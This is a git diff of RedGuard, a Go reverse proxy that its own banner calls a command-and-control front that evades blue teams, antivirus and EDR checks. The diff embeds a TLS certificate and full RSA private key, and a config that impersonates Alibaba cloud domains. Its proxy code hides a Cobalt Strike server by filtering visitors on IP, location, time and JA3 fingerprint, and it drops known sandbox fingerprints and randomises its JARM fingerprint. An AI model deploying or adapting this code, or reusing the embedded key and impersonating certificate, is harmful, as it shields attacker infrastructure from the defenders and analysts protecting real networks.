-YSkgVGVjaG5vbG9neSBDby4sIEx0ZC4xFTATBgNVBAMMDCouYWxpeXVuLmNvbTAe -Fw0yMjA3MTQwMjQyMjRaFw0yMzA3MTQwMjQyMjRaMGYxCzAJBgNVBAYTAkNOMREw -DwYDVQQHEwhIYW5nWmhvdTEtMCsGA1UEChMkQWxpYmFiYSAoQ2hpbmEpIFRlY2hu -b2xvZ3kgQ28uLCBMdGQuMRUwEwYDVQQDDAwqLmFsaXl1bi5jb20wggEiMA0GCSqG -SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCakMhuxLECM6FM6J2tQisFnBdwgTDCNzA0 -WJQ6sOe0rIiMkQ5mhiSrDwUJ3ZFDtxeSxcWRmfcz4SiNMYwS1vGuIBLwNV2qRELk -aFzM29xjMo0isbPvBM70kl29RUP1FT5SUI9ZjwKaVLIc7j0Ugei0+p0QvGtFvgfI -pFpWbav3UqFwUtTcJwCiDTZZM4+94TVqEvFh5f/CM60rFijFZ/Kf16cVtOW0fKcX -oAGA9hEPAYXbSBqBSWAykDBJ3RnbZvL6MD9hsSRgduiiC9t2q/xGRU5X+rKchliW -bjLy+xHoq1asOZK0NxigLIc/6U54IV7nfL/tT40w1GFP/WhgY+0fAgMBAAGjgcUw -gcIwDgYDVR0PAQH/BAQDAgKkMBMGA1UdJQQMMAoGCCsGAQUFBwMBMIGaBgNVHREE -gZIwgY+CDCouYWxpeXVuLmNvbYIabWFuYWdlci5jaGFubmVsLmFsaXl1bi5jb22C -GyouYWNzLWludGVybmFsLmFsaXl1bmNzLmNvbYIUKi5jb25uZWN0LmFsaXl1bi5j -b22CCmFsaXl1bi5jb22CEHdob2lzLnd3dy5uZXQuY26CEnRpYW5jaGktZ2xvYmFs -LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAHPsbex1ZR9p/5p/EdJrvlM3IhMIXUo2D -tm/NWbEB4IVBa+mX0YGs60DiH8R+4VFWKvVhIzcf2/iZuiDKO8jeeZ3mSyDqdPD+ -T40gcNQhvPAH6YMPg8LzYAXVAZcxYCw0PmHr/Sl7EJH8LlR84Nz26HjPqNdLmIZA -ui0jz4zSGtrcqFZzA2+DKiHsnKeQ4685FBUHJP51gyimYiPpQQW3uKPE1uC+8Aq/ -omArVJf9wnBLUWa1vZ4B12G4NVQXHcLvg13tOR0YHnRBJ5OR8ibYBy5VChbqktc4 -9hgOKhm4RO/6XIg6Dey/mBefannq2DgTj2lv9NNXiFppj81ugWhOmQ== ------END CERTIFICATE----- +-----BEGIN CERTIFICATE----- +MIIEFDCCAvygAwIBAgIIFwGR46UNXCwwDQYJKoZIhvcNAQELBQAwZjELMAkGA1UE +BhMCQ04xETAPBgNVBAcTCEhhbmdaaG91MS0wKwYDVQQKEyRBbGliYWJhIChDaGlu +YSkgVGVjaG5vbG9neSBDby4sIEx0ZC4xFTATBgNVBAMMDCouYWxpeXVuLmNvbTAe +Fw0yMjA3MTQwMjQyMjRaFw0yMzA3MTQwMjQyMjRaMGYxCzAJBgNVBAYTAkNOMREw +DwYDVQQHEwhIYW5nWmhvdTEtMCsGA1UEChMkQWxpYmFiYSAoQ2hpbmEpIFRlY2hu +b2xvZ3kgQ28uLCBMdGQuMRUwEwYDVQQDDAwqLmFsaXl1bi5jb20wggEiMA0GCSqG +SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCakMhuxLECM6FM6J2tQisFnBdwgTDCNzA0 +WJQ6sOe0rIiMkQ5mhiSrDwUJ3ZFDtxeSxcWRmfcz4SiNMYwS1vGuIBLwNV2qRELk +aFzM29xjMo0isbPvBM70kl29RUP1FT5SUI9ZjwKaVLIc7j0Ugei0+p0QvGtFvgfI +pFpWbav3UqFwUtTcJwCiDTZZM4+94TVqEvFh5f/CM60rFijFZ/Kf16cVtOW0fKcX +oAGA9hEPAYXbSBqBSWAykDBJ3RnbZvL6MD9hsSRgduiiC9t2q/xGRU5X+rKchliW +bjLy+xHoq1asOZK0NxigLIc/6U54IV7nfL/tT40w1GFP/WhgY+0fAgMBAAGjgcUw +gcIwDgYDVR0PAQH/BAQDAgKkMBMGA1UdJQQMMAoGCCsGAQUFBwMBMIGaBgNVHREE +gZIwgY+CDCouYWxpeXVuLmNvbYIabWFuYWdlci5jaGFubmVsLmFsaXl1bi5jb22C +GyouYWNzLWludGVybmFsLmFsaXl1bmNzLmNvbYIUKi5jb25uZWN0LmFsaXl1bi5j +b22CCmFsaXl1bi5jb22CEHdob2lzLnd3dy5uZXQuY26CEnRpYW5jaGktZ2xvYmFs +LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAHPsbex1ZR9p/5p/EdJrvlM3IhMIXUo2D +tm/NWbEB4IVBa+mX0YGs60DiH8R+4VFWKvVhIzcf2/iZuiDKO8jeeZ3mSyDqdPD+ +T40gcNQhvPAH6YMPg8LzYAXVAZcxYCw0PmHr/Sl7EJH8LlR84Nz26HjPqNdLmIZA +ui0jz4zSGtrcqFZzA2+DKiHsnKeQ4685FBUHJP51gyimYiPpQQW3uKPE1uC+8Aq/ +omArVJf9wnBLUWa1vZ4B12G4NVQXHcLvg13tOR0YHnRBJ5OR8ibYBy5VChbqktc4 +9hgOKhm4RO/6XIg6Dey/mBefannq2DgTj2lv9NNXiFppj81ugWhOmQ== +-----END CERTIFICATE----- diff --git a/cert-rsa/ca.key b/cert-rsa/ca.key index 9f2f92d..c3a5cb3 100644 --- a/cert-rsa/ca.key +++ b/cert-rsa/ca.key @@ -1,27 +1,27 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEowIBAAKCAQEAmpDIbsSxAjOhTOidrUIrBZwXcIEwwjcwNFiUOrDntKyIjJEO -ZoYkqw8FCd2RQ7cXksXFkZn3M+EojTGMEtbxriAS8DVdqkRC5GhczNvcYzKNIrGz -7wTO9JJdvUVD9RU+UlCPWY8CmlSyHO49FIHotPqdELxrRb4HyKRaVm2r91KhcFLU -3CcAog02WTOPveE1ahLxYeX/wjOtKxYoxWfyn9enFbTltHynF6ABgPYRDwGF20ga -gUlgMpAwSd0Z22by+jA/YbEkYHboogvbdqv8RkVOV/qynIZYlm4y8vsR6KtWrDmS -tDcYoCyHP+lOeCFe53y/7U+NMNRhT/1oYGPtHwIDAQABAoIBABoQLewXuK1hXWKl -muj7TlvczUsITduCCNvaz+vxprCdo0zorN/24LoDh1r5hKRBfHUgakc6CigyYG8m -mrMWkZxGBkuBBDFQ32K6gmN883W6sXfXNTspuWgeQjZHNsVd9qtUsEduyQaTH5Gn -Tp9lpILX+6I103ToLVHU/PKz/ZpvjnRdfL1pFvTAzGYRAddI+3Wp4phfzcqqXtpl -WcZ4Uux+/GzFtSH9eXaevCC4p+jcrQY1mt3BPdcz5JU43uQ+diTfTwGvL+4dCUxO -sboAjMkw2xMXNG2SQRMTPlhLfcKh8NK3pYyVRfzOXk6bnLeBsRaLV6uXoR5njk+M -Kr0zzDECgYEAy9/5XwI4LiY1XcXJrJmvilqtHUH1cGG1x8Ob+gpGiJ8Ryk+6i7pi -8KP+scDUOGFfFwRycNwIoGP0J1WB4pRkTDqE8FQyh4TeOsK57NGp8wLt6COOnmps -/8QRH+YqPG5n0yI3aQNOqkPuKoFYCiGF79VuhCuOGLaplXlmyQl/TTcCgYEAwhVp -lLuo5phLvRTr6pgGVPCOhirdTktuRUp4NaNuGveUDww2TjdKBmqLcwVPEtuI3G/f -k2AUKlWH0Q3N8340hG7hloSVQRHfoALy0Iljc4dFO0HrzOvSoaVYkhODqz6M6gfJ -B+8Qiku93JI7G4qalg1jr3ItBK46KVTCQl5RE1kCgYBYEiYww82vKfRN0P6BIFbz -pp44EGFNrfgQFtFPn5a+uDDAO9bzO444NC/3a7yBqpagY9xoIrVbTDKRt1+HmOEH -CRSamVTGtEAoFCyrQBtxjidl685VYtY5WuKm7A/80Rjq3VIgfDxEU1oUZJG6tqac -Z4/5arNUu7vghXRAjmi+2wKBgGUb/psLgJxRLvPcWGMou/O4NqfS4OQPC+1xNFrN -P2kxHaMRO6FX0GqzSt6rH1y1ngEpDxKZ9Sdw04anaGm3j+iGU2O0woTZqOSVZKYb -TQI8sGaEmzFwkZTArPm8zNWDiqnJUIOfmcBSYSDt1XktpgcSBqK6GpXbplUt4N3u -gNJRAoGBAIo2SQXHObtfphpMVoDZm3A2DubekPuY5aHx0x5U24IDcF/19AJ3SvOh -U7NHpHgGDal5WhLN9dIRBxujP/BL1TAKPpf6P5x4o1Jva0tUWcLvTzAM6NgFMY+0 -p4z+rF2IIkG383nWDpSL3r+0mpUEaPY5iCO8fyUQQtIr6gt+o8PW ------END RSA PRIVATE KEY----- +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEAmpDIbsSxAjOhTOidrUIrBZwXcIEwwjcwNFiUOrDntKyIjJEO +ZoYkqw8FCd2RQ7cXksXFkZn3M+EojTGMEtbxriAS8DVdqkRC5GhczNvcYzKNIrGz +7wTO9JJdvUVD9RU+UlCPWY8CmlSyHO49FIHotPqdELxrRb4HyKRaVm2r91KhcFLU +3CcAog02WTOPveE1ahLxYeX/wjOtKxYoxWfyn9enFbTltHynF6ABgPYRDwGF20ga +gUlgMpAwSd0Z22by+jA/YbEkYHboogvbdqv8RkVOV/qynIZYlm4y8vsR6KtWrDmS +tDcYoCyHP+lOeCFe53y/7U+NMNRhT/1oYGPtHwIDAQABAoIBABoQLewXuK1hXWKl +muj7TlvczUsITduCCNvaz+vxprCdo0zorN/24LoDh1r5hKRBfHUgakc6CigyYG8m +mrMWkZxGBkuBBDFQ32K6gmN883W6sXfXNTspuWgeQjZHNsVd9qtUsEduyQaTH5Gn +Tp9lpILX+6I103ToLVHU/PKz/ZpvjnRdfL1pFvTAzGYRAddI+3Wp4phfzcqqXtpl +WcZ4Uux+/GzFtSH9eXaevCC4p+jcrQY1mt3BPdcz5JU43uQ+diTfTwGvL+4dCUxO +sboAjMkw2xMXNG2SQRMTPlhLfcKh8NK3pYyVRfzOXk6bnLeBsRaLV6uXoR5njk+M +Kr0zzDECgYEAy9/5XwI4LiY1XcXJrJmvilqtHUH1cGG1x8Ob+gpGiJ8Ryk+6i7pi +8KP+scDUOGFfFwRycNwIoGP0J1WB4pRkTDqE8FQyh4TeOsK57NGp8wLt6COOnmps +/8QRH+YqPG5n0yI3aQNOqkPuKoFYCiGF79VuhCuOGLaplXlmyQl/TTcCgYEAwhVp +lLuo5phLvRTr6pgGVPCOhirdTktuRUp4NaNuGveUDww2TjdKBmqLcwVPEtuI3G/f +k2AUKlWH0Q3N8340hG7hloSVQRHfoALy0Iljc4dFO0HrzOvSoaVYkhODqz6M6gfJ +B+8Qiku93JI7G4qalg1jr3ItBK46KVTCQl5RE1kCgYBYEiYww82vKfRN0P6BIFbz +pp44EGFNrfgQFtFPn5a+uDDAO9bzO444NC/3a7yBqpagY9xoIrVbTDKRt1+HmOEH +CRSamVTGtEAoFCyrQBtxjidl685VYtY5WuKm7A/80Rjq3VIgfDxEU1oUZJG6tqac +Z4/5arNUu7vghXRAjmi+2wKBgGUb/psLgJxRLvPcWGMou/O4NqfS4OQPC+1xNFrN +P2kxHaMRO6FX0GqzSt6rH1y1ngEpDxKZ9Sdw04anaGm3j+iGU2O0woTZqOSVZKYb +TQI8sGaEmzFwkZTArPm8zNWDiqnJUIOfmcBSYSDt1XktpgcSBqK6GpXbplUt4N3u +gNJRAoGBAIo2SQXHObtfphpMVoDZm3A2DubekPuY5aHx0x5U24IDcF/19AJ3SvOh +U7NHpHgGDal5WhLN9dIRBxujP/BL1TAKPpf6P5x4o1Jva0tUWcLvTzAM6NgFMY+0 +p4z+rF2IIkG383nWDpSL3r+0mpUEaPY5iCO8fyUQQtIr6gt+o8PW +-----END RSA PRIVATE KEY----- diff --git a/config/RedGuard_CobaltStrike.go b/config/RedGuard_CobaltStrike.go index 0c719e4..9af140f 100644 --- a/config/RedGuard_CobaltStrike.go +++ b/config/RedGuard_CobaltStrike.go @@ -1,37 +1,37 @@ -package config - -var RedGuardConfig = `[cert] -# User Optional name -DNSName = *.aliyun.com,manager.channel.aliyun.com,*.acs-internal.aliyuncs.com,*.connect.aliyun.com,aliyun.com,whois.www.net.cn,tianchi-global.com -# Cert User CommonName -CommonName = *.aliyun.com -# Cert User Locality -Locality = HangZhou -# Cert User Organization -Organization = Alibaba (China) Technology Co., Ltd. -# Cert User Country -Country = CN -# Whether to use the certificate you have applied for true/false -HasCert = true - -[proxy] -# key : Header Host value of the reverse proxy -# value : The actual address forwarded by the reverse proxy -HostTarget = {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -# HTTPS Reverse proxy port -Port_HTTPS = :443 -# HTTP Reverse proxy port -Port_HTTP = :80 -# RedGuard interception action: redirect / reset / proxy (Hijack HTTP Response) -drop_action = proxy -# URL to redirect to -Redirect = https://360.net -# IP address owning restrictions example:AllowLocation = 山东,上海,杭州 or shanghai,beijing -AllowLocation = * -# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1 -AllowIP = * -# Limit the time of requests example: AllowTime = 8:00 - 16:00 -AllowTime = * -# C2 Malleable File Path -MalleableFile = * -` +package config + +var RedGuardConfig = `[cert] +# User Optional name +DNSName = *.aliyun.com,manager.channel.aliyun.com,*.acs-internal.aliyuncs.com,*.connect.aliyun.com,aliyun.com,whois.www.net.cn,tianchi-global.com +# Cert User CommonName +CommonName = *.aliyun.com +# Cert User Locality +Locality = HangZhou +# Cert User Organization +Organization = Alibaba (China) Technology Co., Ltd. +# Cert User Country +Country = CN +# Whether to use the certificate you have applied for true/false +HasCert = true + +[proxy] +# key : Header Host value of the reverse proxy +# value : The actual address forwarded by the reverse proxy +HostTarget = {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +# HTTPS Reverse proxy port +Port_HTTPS = :443 +# HTTP Reverse proxy port +Port_HTTP = :80 +# RedGuard interception action: redirect / reset / proxy (Hijack HTTP Response) +drop_action = proxy +# URL to redirect to +Redirect = https://360.net +# IP address owning restrictions example:AllowLocation = 山东,上海,杭州 or shanghai,beijing +AllowLocation = * +# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1 +AllowIP = * +# Limit the time of requests example: AllowTime = 8:00 - 16:00 +AllowTime = * +# C2 Malleable File Path +MalleableFile = * +` diff --git a/config/version.go b/config/version.go index f1270e0..9165e13 100644 --- a/config/version.go +++ b/config/version.go @@ -1,31 +1,31 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: version.go - * @Time: 2022/5/5 9:25 - **/ - -package config - -const ( - BANNER = ` - -██████╗ ███████╗██████╗ ██████╗ ██╗ ██╗ █████╗ ██████╗ ██████╗ -██╔══██╗██╔════╝██╔══██╗ ██╔════╝ ██║ ██║██╔══██╗██╔══██╗██╔══██╗ -██████╔╝█████╗ ██║ ██║ ██║ ███╗██║ ██║███████║██████╔╝██║ ██║ -██╔══██╗██╔══╝ ██║ ██║ ██║ ██║██║ ██║██╔══██║██╔══██╗██║ ██║ -██║ ██║███████╗██████╔╝ ╚██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝ -V %s -╚═╝ ╚═╝╚══════╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ - -Github:%s - -RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check. -` - VERSION = "22.7.21 Alpha" - TITLE = "RedGuard" - LICENSE = "GPL-2.0" - URL = "https://github.com/wikiZ/RedGuard" - AUTHOR = "风起" - TEAM = "0/00" - COPYRIGHT = "Copyright (C) 2022 风起. All Rights Reserved" -) +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: version.go + * @Time: 2022/5/5 9:25 + **/ + +package config + +const ( + BANNER = ` + +██████╗ ███████╗██████╗ ██████╗ ██╗ ██╗ █████╗ ██████╗ ██████╗ +██╔══██╗██╔════╝██╔══██╗ ██╔════╝ ██║ ██║██╔══██╗██╔══██╗██╔══██╗ +██████╔╝█████╗ ██║ ██║ ██║ ███╗██║ ██║███████║██████╔╝██║ ██║ +██╔══██╗██╔══╝ ██║ ██║ ██║ ██║██║ ██║██╔══██║██╔══██╗██║ ██║ +██║ ██║███████╗██████╔╝ ╚██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝ -V %s +╚═╝ ╚═╝╚══════╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ + +Github:%s + +RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check. +` + VERSION = "22.7.21 Alpha" + TITLE = "RedGuard" + LICENSE = "GPL-2.0" + URL = "https://github.com/wikiZ/RedGuard" + AUTHOR = "风起" + TEAM = "0/00" + COPYRIGHT = "Copyright (C) 2022 风起. All Rights Reserved" +) diff --git a/core/ProxyFilter.go b/core/ProxyFilter.go index a120d80..44e20dd 100644 --- a/core/ProxyFilter.go +++ b/core/ProxyFilter.go @@ -119,6 +119,7 @@ func ProxyFilterManger(req *http.Request) (status bool) { allowIP = lib.ReadConfig("proxy", "AllowIP", cfg) // Obtain the online IP address whitelist allowTime = lib.ReadConfig("proxy", "AllowTime", cfg) // Gets the allowed online time in the configuration file malleableFile = lib.ReadConfig("proxy", "MalleableFile", cfg) // Obtain the profile path + banJA3 = data.BANJA3 banIP = data.BANIP ) // Check whether ban ip is matched @@ -132,6 +133,13 @@ func ProxyFilterManger(req *http.Request) (status bool) { } } } + // Check whether the REQUESTED IP JA3 fingerprint is a cloud sandbox fingerprint + for _, banja3 := range strings.Split(banJA3, "\n") { + if banja3 == lib.EncodeMD5(req.JA3) { + logger.Errorf("[DROP] %s Requested HOST JA3 FingerPrint is forbidden to access", ip) + return false + } + } // Check the location of the requested IP address if allowLocation != "" && allowLocation != "*" { // @param allowLocation string The territory that is allowed to go online diff --git a/core/ProxyHandler.go b/core/ProxyHandler.go index a0a9e6d..5cc57e9 100644 --- a/core/ProxyHandler.go +++ b/core/ProxyHandler.go @@ -1,194 +1,194 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: ProxyHandler.go - * @Time: 2022/5/5 16:53 - **/ - -package core - -import ( - "io" - "math/rand" - "net/url" - "strconv" - "strings" - "sync" - "time" - - "RedGuard/lib" - - "github.com/sleeyax/ja3rp/crypto/tls" - "github.com/sleeyax/ja3rp/net/http" - "github.com/sleeyax/ja3rp/net/http/httputil" - "github.com/wxnacy/wgo/arrays" -) - -var ( - ip string // HTTP remote IP - redirectURL string // Proxy redirect URL - _addressArray []string // By request list - _startUp sync.Mutex // mutex lock - _hostProxy = make(map[string]*httputil.ReverseProxy) // Used to cache httputil.ReverseProxy -) - -type baseHandle struct{} - -func NewProxy(proxyURL string, dropType bool) (*httputil.ReverseProxy, error) { - destinationURL, err := url.Parse(proxyURL) - if err != nil { - return nil, err - } - proxy := httputil.NewSingleHostReverseProxy(destinationURL) - // dropType Check whether the response to the request is changed - proxy.ModifyResponse = modifyResponse(dropType) // Modifies the response to the request - return proxy, nil -} - -func modifyResponse(drop bool) func(*http.Response) error { - return func(resp *http.Response) error { - defer func(Body io.ReadCloser) { - logger.Warningf("[RESPONSE] HTTP %s, length: %d", resp.Status, resp.ContentLength) - if drop { - // DROP Request - logger.Alertf("[DROP] Source IP: %s", resp.Request.RemoteAddr) - _ = Body.Close() // Direct shutdown response - return - } - }(resp.Body) - return nil - } -} - -// ProxyRequestHandler A reverse proxy processes HTTP requests -func (h *baseHandle) ServeHTTP(write http.ResponseWriter, req *http.Request) { - var ( - host = &req.Host - cfg = lib.InitConfig() // config file object - // Obtain the domain name and target map - hostTarget = lib.JsonToMap(lib.ReadConfig( - "proxy", - "HostTarget", - cfg), - ) - // Read the configuration file to check whether DROP is enabled - dropAction = lib.ReadConfig("proxy", "drop_action", cfg) - // IP address of the host that initiates the request - ) - var isDrop bool - var proxy *httputil.ReverseProxy - // Determine the URL to be redirected to - redirectURL = lib.ReadConfig("proxy", "Redirect", cfg) - req.RemoteAddr = lib.ConvertIP(req.RemoteAddr) - // Obtaining the real IP address - if req.Header.Get("X-Forwarded-For") != "" { - req.RemoteAddr = req.Header.Get("X-Forwarded-For") - } - // Set the forwarding header XFF so that C2 obtains the online real IP address - req.Header.Set("X-Forwarded-For", req.RemoteAddr) - // Check whether the host is verified - if IPHash := lib.EncodeMD5(req.JA3); arrays.ContainsString(_addressArray, req.JA3) == -1 { - logger.Noticef("JA3 FingerPrint: %s", IPHash) - logger.Noticef("[REQUEST] %s %s", req.Method, req.RequestURI) - // Request filtering method - if !ProxyFilterManger(req) { - goto LOOK // Redirect to the specified site - } - logger.Noticef("[REQUEST] %s - %s", req.RemoteAddr, req.UserAgent()) - _addressArray = append(_addressArray, IPHash) // Add to the list after verification for the first time - } - // Fetch directly from cache - if fn, ok := _hostProxy[*host]; ok { - fn.ServeHTTP(write, req) - return - } - // Check whether the domain name is in the whitelist - if target, ok := hostTarget[*host]; ok { - proxy, err := NewProxy(target, false) - if err != nil { - logger.Error("Proxy Exception") - } - _hostProxy[*host] = proxy // Into the cache - proxy.ServeHTTP(write, req) - return - } - -LOOK: - req.URL.Path = "/" // Url rewriting - // condition is not met, the element is removed from the slice - // Output The URL of each request for this IP address - if len(_addressArray) > 0 { - _addressArray = _addressArray[:len(_addressArray)-1] - } - // dropAction Select the reverse proxy interception mode - switch dropAction { - // redirect - case "redirect": - http.Redirect(write, req, redirectURL, http.StatusTemporaryRedirect) - goto REDIRECT - // reset Turning off the HTTP response - case "reset": - isDrop = true - // proxy Hijacking target requests response information - case "proxy": - break - } - // Determine whether to redirect or intercept intercepted traffic - proxy, _ = NewProxy(redirectURL, isDrop) - // Unauthorized access is redirected to the specified URL - proxy.ServeHTTP(write, req) -REDIRECT: - // REDIRECT Request - logger.Alertf("[%s] Source IP: %s -> Destination Site: %s", strings.ToUpper(dropAction), req.RemoteAddr, redirectURL) -} - -// ProxyManger Initialize the reverse proxy and pass in the address of the real back-end service -// handle all requests to your server using the proxy -// @param action string reverse proxy listening port type -// @param port string reverse proxy listening port -// @param pattern string pattern associated with the listening port type -func ProxyManger(action, port, pattern string) { - var ( - handle = &baseHandle{} - config = &tls.Config{} // Example Initialize TLS config - _isHasCert, _ = strconv.ParseBool(lib.ReadConfig("cert", "HasCert", lib.InitConfig())) - ) - _startUp.Lock() // 我知道这可能是一个bug哈哈哈,但是它可能不影响什么,就不修了。 - http.Handle(pattern, handle) - // Cancels the validity verification of the destination TLS certificate - http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{ - InsecureSkipVerify: true, - } - // Disable client connection caching to connection pools - http.DefaultTransport.(*http.Transport).DisableKeepAlives = true - rand.Seed(time.Now().UnixNano()) - if !_isHasCert { - config = &tls.Config{ - // JARM FingerPrint Random - CipherSuites: lib.MicsSlice([]uint16{ - 0x0005, 0x000a, 0x002f, - 0x0035, 0x003c, 0x009c, - 0x009d, 0xc011, 0xc012, - 0xc013, 0xc014, 0xc027, - 0xc02f, 0xc030, 0xcca8, - }, rand.Intn(2)+1), - } - } - server := &http.Server{ - Addr: port, // proxy port - Handler: handle, // Cache structure - TLSConfig: config, // TLS Server Config - TLSNextProto: make(map[string]func(*http.Server, *tls.Conn, http.Handler), 1), - } - logger.Warningf("Proxy Listen Port %s (%s)", port, action) - _startUp.Unlock() - if action == "HTTPS" { - // HTTPS reverse proxy - _ = server.ListenAndServeTLS( - "cert-rsa/ca.crt", // rsa cert crt - "cert-rsa/ca.key", // rsa cert key - ) - } else { - _ = server.ListenAndServe() // HTTP reverse proxy - } -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: ProxyHandler.go + * @Time: 2022/5/5 16:53 + **/ + +package core + +import ( + "io" + "math/rand" + "net/url" + "strconv" + "strings" + "sync" + "time" + + "RedGuard/lib" + + "github.com/sleeyax/ja3rp/crypto/tls" + "github.com/sleeyax/ja3rp/net/http" + "github.com/sleeyax/ja3rp/net/http/httputil" + "github.com/wxnacy/wgo/arrays" +) + +var ( + ip string // HTTP remote IP + redirectURL string // Proxy redirect URL + _addressArray []string // By request list + _startUp sync.Mutex // mutex lock + _hostProxy = make(map[string]*httputil.ReverseProxy) // Used to cache httputil.ReverseProxy +) + +type baseHandle struct{} + +func NewProxy(proxyURL string, dropType bool) (*httputil.ReverseProxy, error) { + destinationURL, err := url.Parse(proxyURL) + if err != nil { + return nil, err + } + proxy := httputil.NewSingleHostReverseProxy(destinationURL) + // dropType Check whether the response to the request is changed + proxy.ModifyResponse = modifyResponse(dropType) // Modifies the response to the request + return proxy, nil +} + +func modifyResponse(drop bool) func(*http.Response) error { + return func(resp *http.Response) error { + defer func(Body io.ReadCloser) { + logger.Warningf("[RESPONSE] HTTP %s, length: %d", resp.Status, resp.ContentLength) + if drop { + // DROP Request + logger.Alertf("[DROP] Source IP: %s", resp.Request.RemoteAddr) + _ = Body.Close() // Direct shutdown response + return + } + }(resp.Body) + return nil + } +} + +// ProxyRequestHandler A reverse proxy processes HTTP requests +func (h *baseHandle) ServeHTTP(write http.ResponseWriter, req *http.Request) { + var ( + host = &req.Host + cfg = lib.InitConfig() // config file object + // Obtain the domain name and target map + hostTarget = lib.JsonToMap(lib.ReadConfig( + "proxy", + "HostTarget", + cfg), + ) + // Read the configuration file to check whether DROP is enabled + dropAction = lib.ReadConfig("proxy", "drop_action", cfg) + // IP address of the host that initiates the request + ) + var isDrop bool + var proxy *httputil.ReverseProxy + // Determine the URL to be redirected to + redirectURL = lib.ReadConfig("proxy", "Redirect", cfg) + req.RemoteAddr = lib.ConvertIP(req.RemoteAddr) + // Obtaining the real IP address + if req.Header.Get("X-Forwarded-For") != "" { + req.RemoteAddr = req.Header.Get("X-Forwarded-For") + } + // Set the forwarding header XFF so that C2 obtains the online real IP address + req.Header.Set("X-Forwarded-For", req.RemoteAddr) + // Check whether the host is verified + if IPHash := lib.EncodeMD5(req.JA3); arrays.ContainsString(_addressArray, req.JA3) == -1 { + logger.Noticef("JA3 FingerPrint: %s", IPHash) + logger.Noticef("[REQUEST] %s %s", req.Method, req.RequestURI) + // Request filtering method + if !ProxyFilterManger(req) { + goto LOOK // Redirect to the specified site + } + logger.Noticef("[REQUEST] %s - %s", req.RemoteAddr, req.UserAgent()) + _addressArray = append(_addressArray, IPHash) // Add to the list after verification for the first time + } + // Fetch directly from cache + if fn, ok := _hostProxy[*host]; ok { + fn.ServeHTTP(write, req) + return + } + // Check whether the domain name is in the whitelist + if target, ok := hostTarget[*host]; ok { + proxy, err := NewProxy(target, false) + if err != nil { + logger.Error("Proxy Exception") + } + _hostProxy[*host] = proxy // Into the cache + proxy.ServeHTTP(write, req) + return + } + +LOOK: + req.URL.Path = "/" // Url rewriting + // condition is not met, the element is removed from the slice + // Output The URL of each request for this IP address + if len(_addressArray) > 0 { + _addressArray = _addressArray[:len(_addressArray)-1] + } + // dropAction Select the reverse proxy interception mode + switch dropAction { + // redirect + case "redirect": + http.Redirect(write, req, redirectURL, http.StatusTemporaryRedirect) + goto REDIRECT + // reset Turning off the HTTP response + case "reset": + isDrop = true + // proxy Hijacking target requests response information + case "proxy": + break + } + // Determine whether to redirect or intercept intercepted traffic + proxy, _ = NewProxy(redirectURL, isDrop) + // Unauthorized access is redirected to the specified URL + proxy.ServeHTTP(write, req) +REDIRECT: + // REDIRECT Request + logger.Alertf("[%s] Source IP: %s -> Destination Site: %s", strings.ToUpper(dropAction), req.RemoteAddr, redirectURL) +} + +// ProxyManger Initialize the reverse proxy and pass in the address of the real back-end service +// handle all requests to your server using the proxy +// @param action string reverse proxy listening port type +// @param port string reverse proxy listening port +// @param pattern string pattern associated with the listening port type +func ProxyManger(action, port, pattern string) { + var ( + handle = &baseHandle{} + config = &tls.Config{} // Example Initialize TLS config + _isHasCert, _ = strconv.ParseBool(lib.ReadConfig("cert", "HasCert", lib.InitConfig())) + ) + _startUp.Lock() // 我知道这可能是一个bug哈哈哈,但是它可能不影响什么,就不修了。 + http.Handle(pattern, handle) + // Cancels the validity verification of the destination TLS certificate + http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{ + InsecureSkipVerify: true, + } + // Disable client connection caching to connection pools + http.DefaultTransport.(*http.Transport).DisableKeepAlives = true + rand.Seed(time.Now().UnixNano()) + if !_isHasCert { + config = &tls.Config{ + // JARM FingerPrint Random + CipherSuites: lib.MicsSlice([]uint16{ + 0x0005, 0x000a, 0x002f, + 0x0035, 0x003c, 0x009c, + 0x009d, 0xc011, 0xc012, + 0xc013, 0xc014, 0xc027, + 0xc02f, 0xc030, 0xcca8, + }, rand.Intn(2)+1), + } + } + server := &http.Server{ + Addr: port, // proxy port + Handler: handle, // Cache structure + TLSConfig: config, // TLS Server Config + TLSNextProto: make(map[string]func(*http.Server, *tls.Conn, http.Handler), 1), + } + logger.Warningf("Proxy Listen Port %s (%s)", port, action) + _startUp.Unlock() + if action == "HTTPS" { + // HTTPS reverse proxy + _ = server.ListenAndServeTLS( + "cert-rsa/ca.crt", // rsa cert crt + "cert-rsa/ca.key", // rsa cert key + ) + } else { + _ = server.ListenAndServe() // HTTP reverse proxy + } +} diff --git a/core/arguments.go b/core/arguments.go index 7e1d641..f2c09bf 100644 --- a/core/arguments.go +++ b/core/arguments.go @@ -1,38 +1,38 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: arguments.go - * @Time: 2022/5/5 9:46 - **/ - -package core - -import ( - "flag" - - "RedGuard/core/parameter" -) - -func CmdParse(parse *parameter.Parses, cert *parameter.Cert, proxy *parameter.Proxy) { - flag.BoolVar(&parse.Update, "u", false, `Enable configuration file modification`) - flag.StringVar(&parse.C2Type, "type", `CobaltStrike`, `C2 Server Type`) - flag.StringVar(&parse.IP, "ip", ``, `IPLookUP IP`) - 